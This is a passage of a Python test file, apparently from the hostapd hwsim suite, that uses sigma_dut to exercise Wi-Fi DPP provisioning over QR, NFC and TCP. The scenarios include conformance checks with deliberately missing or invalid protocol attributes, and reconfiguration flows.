raise Exception("dev_exec_action did not succeed: " + res)
def run_sigma_dut_dpp_proto_peer_disc_req(dev, apdev, args):
sigma = start_sigma_dut(dev[0].ifname)
try:
init_sigma_dut_dpp_proto_peer_disc_req(dev, apdev)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes,DPPFrameType,PeerDiscoveryRequest," + args, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,Errorsent" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0", allow_fail=True)
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_proto_peer_disc_req(dev, apdev):
"""sigma_dut DPP protocol testing - Peer Discovery Request"""
run_sigma_dut_dpp_proto_peer_disc_req(dev, apdev, "DPPStep,MissingAttribute,DPPIEAttribute,TransactionID")
def test_sigma_dut_dpp_proto_peer_disc_req2(dev, apdev):
"""sigma_dut DPP protocol testing - Peer Discovery Request (2)"""
check_dpp_capab(dev[0], min_ver=3)
run_sigma_dut_dpp_proto_peer_disc_req(dev, apdev, "DPPStep,MissingAttribute,DPPIEAttribute,ProtocolVersion")
def test_sigma_dut_dpp_proto_peer_disc_req3(dev, apdev):
"""sigma_dut DPP protocol testing - Peer Discovery Request (e)"""
check_dpp_capab(dev[0], min_ver=3)
run_sigma_dut_dpp_proto_peer_disc_req(dev, apdev, "DPPStep,InvalidValue,DPPIEAttribute,ProtocolVersion")
def test_sigma_dut_dpp_self_config(dev, apdev):
"""sigma_dut DPP Configurator enrolling an AP and using self-configuration"""
check_dpp_capab(dev[0])
hapd = hostapd.add_ap(apdev[0], {"ssid": "unconfigured"})
check_dpp_capab(hapd)
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
id = hapd.dpp_bootstrap_gen(chan="81/1", mac=True)
uri = hapd.request("DPP_BOOTSTRAP_GET_URI %d" % id)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,AP,DPPBS,QR,DPPTimeout,6")
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
update_hapd_config(hapd)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPCryptoIdentifier,P-256,DPPBS,QR,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPAuthDirection,Single,DPPConfIndex,1,DPPTimeout,6,DPPWaitForConnect,Yes,DPPSelfConfigure,Yes"
res = sigma_dut_cmd(cmd, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
dev[0].set("dpp_config_processing", "0")
def test_sigma_dut_ap_dpp_self_config(dev, apdev, params):
"""sigma_dut DPP AP Configurator using self-configuration"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_dpp_self_config.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_self_config(dev, apdev)
finally:
stop_sigma_dut(sigma)
dev[0].set("dpp_config_processing", "0", allow_fail=True)
def run_sigma_dut_ap_dpp_self_config(dev, apdev):
check_dpp_capab(dev[0])
sigma_dut_cmd_check("ap_reset_default,program,DPP")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,AP,DPPBS,QR,DPPConfIndex,1,DPPSelfConfigure,Yes,DPPTimeout,6", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[0].set("dpp_config_processing", "2")
id = dev[0].dpp_bootstrap_gen(chan="81/11", mac=True)
uri = dev[0].request("DPP_BOOTSTRAP_GET_URI %d" % id)
cmd = "DPP_LISTEN 2462 role=enrollee"
if "OK" not in dev[0].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6"
res = sigma_dut_cmd(cmd)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[0].wait_connected(timeout=20)
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_ap_dpp_relay(dev, apdev, params):
"""sigma_dut DPP AP as Relay to Controller"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_dpp_relay.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_relay(dev, apdev)
finally:
stop_sigma_dut(sigma)
dev[1].request("DPP_CONTROLLER_STOP")
def run_sigma_dut_ap_dpp_relay(dev, apdev):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
# Controller
conf_id = dev[1].dpp_configurator_add()
dev[1].set("dpp_configurator_params",
" conf=sta-dpp configurator=%d" % conf_id)
id_c = dev[1].dpp_bootstrap_gen()
uri_c = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_c)
res = dev[1].request("DPP_BOOTSTRAP_INFO %d" % id_c)
pkhash = None
for line in res.splitlines():
name, value = line.split('=')
if name == "pkhash":
pkhash = value
break
if not pkhash:
raise Exception("Could not fetch public key hash from Controller")
if "OK" not in dev[1].request("DPP_CONTROLLER_START"):
raise Exception("Failed to start Controller")
sigma_dut_cmd_check("ap_reset_default,program,DPP")
sigma_dut_cmd_check("ap_preset_testparameters,program,DPP,DPPConfiguratorAddress,127.0.0.1,DPPConfiguratorPKHash," + pkhash)
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
dev[0].dpp_auth_init(uri=uri_c, role="enrollee")
wait_auth_success(dev[1], dev[0], configurator=dev[1], enrollee=dev[0])
sigma_dut_cmd_check("ap_reset_default")
def dpp_init_tcp_enrollee(dev, id1):
logger.info("Starting DPP initiator/enrollee (TCP) in a thread")
time.sleep(1)
cmd = "DPP_AUTH_INIT peer=%d role=enrollee tcp_addr=127.0.0.1" % id1
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-RECEIVED"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP initiator/enrollee done")
def test_sigma_dut_dpp_tcp_conf_resp(dev, apdev):
"""sigma_dut DPP TCP Configurator (Controller) as responder"""
run_sigma_dut_dpp_tcp_conf_resp(dev)
def run_sigma_dut_dpp_tcp_conf_resp(dev, status_query=False):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
t = threading.Thread(target=dpp_init_tcp_enrollee, args=(dev[1], id1))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPConfIndex,1,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPBS,QR,DPPOverTCP,yes,DPPTimeout,6"
if status_query:
cmd += ",DPPStatusQuery,Yes"
res = sigma_dut_cmd(cmd, timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
if status_query and "StatusResult,0" not in res:
raise Exception("Status query did not succeed: " + res)
finally:
stop_sigma_dut(sigma)
def dpp_init_tcp_configurator(dev, id1, conf_id):
logger.info("Starting DPP initiator/configurator (TCP) in a thread")
time.sleep(1)
cmd = "DPP_AUTH_INIT peer=%d role=configurator conf=sta-dpp configurator=%d tcp_addr=127.0.0.1" % (id1, conf_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def test_sigma_dut_dpp_tcp_enrollee_resp(dev, apdev):
"""sigma_dut DPP TCP Enrollee (Controller) as responder"""
run_sigma_dut_dpp_tcp_enrollee_resp(dev)
def run_sigma_dut_dpp_tcp_enrollee_resp(dev, status_query=False):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id1 = dev[1].dpp_qr_code(uri)
t = threading.Thread(target=dpp_init_tcp_configurator, args=(dev[1], id1, conf_id))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPSigningKeyECC,P-256,DPPBS,QR,DPPOverTCP,yes,DPPTimeout,6"
if status_query:
cmd += ",DPPStatusQuery,Yes"
res = sigma_dut_cmd(cmd, timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
if status_query and "StatusResult,0" not in res:
raise Exception("Status query did not succeed: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_tcp_enrollee_init(dev, apdev):
"""sigma_dut DPP TCP Enrollee as initiator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
# Controller
conf_id = dev[1].dpp_configurator_add()
dev[1].set("dpp_configurator_params",
" conf=sta-dpp configurator=%d" % conf_id)
id_c = dev[1].dpp_bootstrap_gen()
uri_c = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_c)
if "OK" not in dev[1].request("DPP_CONTROLLER_START"):
raise Exception("Failed to start Controller")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri_c))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPOverTCP,127.0.0.1,DPPTimeout,6"
res = sigma_dut_cmd(cmd, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
dev[1].request("DPP_CONTROLLER_STOP")
def test_sigma_dut_ap_dpp_tcp_enrollee_init(dev, apdev, params):
"""sigma_dut DPP AP as TCP Enrollee/initiator"""
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_tcp_enrollee_init(dev, apdev)
finally:
stop_sigma_dut(sigma)
dev[1].request("DPP_CONTROLLER_STOP")
def run_sigma_dut_ap_dpp_tcp_enrollee_init(dev, apdev):
check_dpp_capab(dev[1])
# Controller
conf_id = dev[1].dpp_configurator_add()
dev[1].set("dpp_configurator_params",
"conf=ap-dpp configurator=%d" % conf_id)
id_c = dev[1].dpp_bootstrap_gen()
uri_c = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_c)
if "OK" not in dev[1].request("DPP_CONTROLLER_START"):
raise Exception("Failed to start Controller")
sigma_dut_cmd_check("ap_reset_default,program,DPP")
sigma_dut_cmd_check("ap_preset_testparameters,Program,DPP,NAME,AP,oper_chn,6")
sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri_c))
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPOverTCP,127.0.0.1,DPPTimeout,6"
res = sigma_dut_cmd(cmd, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_dpp_tcp_enrollee_init_mutual(dev, apdev):
"""sigma_dut DPP TCP Enrollee as initiator with mutual authentication"""
check_dpp_capab(dev[0], min_ver=2)
check_dpp_capab(dev[1], min_ver=2)
sigma = start_sigma_dut(dev[0].ifname)
try:
# Controller
conf_id = dev[1].dpp_configurator_add()
dev[1].set("dpp_configurator_params",
"conf=sta-dpp configurator=%d" % conf_id)
id_c = dev[1].dpp_bootstrap_gen()
uri_c = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_c)
if "OK" not in dev[1].request("DPP_CONTROLLER_START"):
raise Exception("Failed to start Controller")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri_c))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd_check(cmd)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPOverTCP,127.0.0.1,DPPTimeout,6"
res = sigma_dut_cmd(cmd, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
dev[1].request("DPP_CONTROLLER_STOP")
def test_sigma_dut_dpp_tcp_configurator_init_mutual(dev, apdev):
"""sigma_dut DPP TCP Configurator as initiator with mutual authentication"""
check_dpp_capab(dev[0], min_ver=2)
check_dpp_capab(dev[1], min_ver=2)
sigma = start_sigma_dut(dev[0].ifname)
try:
id_c = dev[1].dpp_bootstrap_gen()
uri_c = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_c)
if "OK" not in dev[1].request("DPP_CONTROLLER_START role=enrollee"):
raise Exception("Failed to start Controller")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri_c))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd_check(cmd)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Mutual,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPOverTCP,127.0.0.1,DPPTimeout,6"
res = sigma_dut_cmd(cmd, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
dev[1].request("DPP_CONTROLLER_STOP")
def test_sigma_dut_dpp_nfc_handover_requestor_enrollee(dev, apdev):
"""sigma_dut DPP/NFC handover requestor as Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
id_own = dev[1].dpp_bootstrap_gen(type="nfc-uri", chan="81/1,6,11",
mac=True)
uri_own = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_own)
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPBS,NFC")
hex = res.split(',')[3]
uri_peer = from_hex(hex)
logger.info("URI from sigma_dut: " + uri_peer)
sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,NFC" % to_hex(uri_own))
res = dev[1].request("DPP_NFC_HANDOVER_REQ own=%d uri=%s" % (id_own,
uri_peer))
if "FAIL" in res:
raise Exception("Failed to process NFC Handover Request")
info = dev[1].request("DPP_BOOTSTRAP_INFO %d" % id_own)
logger.info("Updated local bootstrapping info:\n" + info)
freq = None
for line in info.splitlines():
if line.startswith("use_freq="):
freq = int(line.split('=')[1])
if freq is None:
raise Exception("Selected channel not indicated")
uri1 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_own)
logger.info("Updated URI[1]: " + uri1)
dev[1].dpp_listen(freq, role="configurator")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,NFC,DPPNFCHandover,Negotiated_Requestor,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_nfc_handover_selector_enrollee(dev, apdev):
"""sigma_dut DPP/NFC handover selector as Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
id_own = dev[1].dpp_bootstrap_gen(type="nfc-uri", chan="81/1,6,11",
mac=True)
uri_own = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_own)
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPBS,NFC")
hex = res.split(',')[3]
uri_peer = from_hex(hex)
logger.info("URI from sigma_dut: " + uri_peer)
sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,NFC" % to_hex(uri_own))
res = dev[1].request("DPP_NFC_HANDOVER_SEL own=%d uri=%s" % (id_own,
uri_peer))
if "FAIL" in res:
raise Exception("Failed to process NFC Handover Select")
peer = int(res)
dev[1].dpp_auth_init(peer=peer, own=id_own, configurator=conf_id,
conf="sta-dpp", ssid="DPPNET01")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,NFC,DPPNFCHandover,Negotiated_Selector,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_nfc_static_read_enrollee(dev, apdev):
"""sigma_dut DPP/NFC read tag as Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
id_own = dev[1].dpp_bootstrap_gen(type="nfc-uri", chan="81/6", mac=True)
uri_own = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_own)
sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,NFC" % to_hex(uri_own))
dev[1].dpp_listen(2437, role="configurator")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,NFC,DPPNFCHandover,Static,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_nfc_static_write_enrollee(dev, apdev):
"""sigma_dut DPP/NFC write tag as Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPBS,NFC")
hex = res.split(',')[3]
uri_peer = from_hex(hex)
logger.info("URI from sigma_dut: " + uri_peer)
dev[1].dpp_auth_init(nfc_uri=uri_peer, configurator=conf_id,
conf="sta-dpp", ssid="DPPNET01")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPProvisioningRole,Enrollee,DPPBS,NFC,DPPNFCHandover,Static,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_reconfig_enrollee(dev, apdev):
"""sigma_dut DPP reconfiguration (Enrollee)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
ifname = dev[0].ifname
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
hapd.disable()
dev[0].dump_monitor()
ssid = "reconfig"
passphrase = "secret passphrase"
params = hostapd.wpa2_params(ssid=ssid, passphrase=passphrase)
hapd = hostapd.add_ap(apdev[0], params)
dev[1].set("dpp_configurator_params",
"conf=sta-psk ssid=%s pass=%s conn_status=1" % (binascii.hexlify(ssid.encode()).decode(), binascii.hexlify(passphrase.encode()).decode()))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
dev[1].dump_monitor()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,DPPReconfigure,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "status,COMPLETE,ReconfigAuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected reconfiguration result: " + res)
ev = dev[1].wait_event(["DPP-CONF-SENT"], timeout=15)
if ev is None:
raise Exception("DPP Config Response (reconfig) not transmitted")
dev[0].wait_connected(timeout=20)
ev = dev[1].wait_event(["DPP-CONN-STATUS-RESULT"], timeout=20)
if ev is None:
raise Exception("No connection status reported")
if "result=0" not in ev:
raise Exception("Connection status did not report success: " + ev)
time.sleep(1)
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
dev[0].dump_monitor()
dev[1].dump_monitor()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,DPPReconfigure,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=30)
if "status,COMPLETE,ReconfigAuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected reconfiguration [2] result: " + res)
ev = dev[1].wait_event(["DPP-CONF-SENT"], timeout=5)
if ev is None:
raise Exception("DPP Config Response (reconfig) not transmitted [2]")
dev[0].wait_connected(timeout=20)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_reconfig_configurator(dev, apdev):
"""sigma_dut DPP reconfiguration (Configurator)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[1].set("dpp_config_processing", "1")
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
ifname = dev[0].ifname
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPConfIndex,1,DPPBS,QR,DPPTimeout,6", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[0].dump_monitor()
ev = dev[1].wait_event(["DPP-NETWORK-ID"], timeout=1)
if ev is None:
raise Exception("No network profile created")
id = int(ev.split(' ')[1])
ev = dev[1].wait_event(["DPP-TX-STATUS"], timeout=5)
if ev is None:
raise Exception("Configuration Result not sent")
dev[1].dump_monitor()
cmd = "DPP_RECONFIG %d" % id
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start reconfiguration")
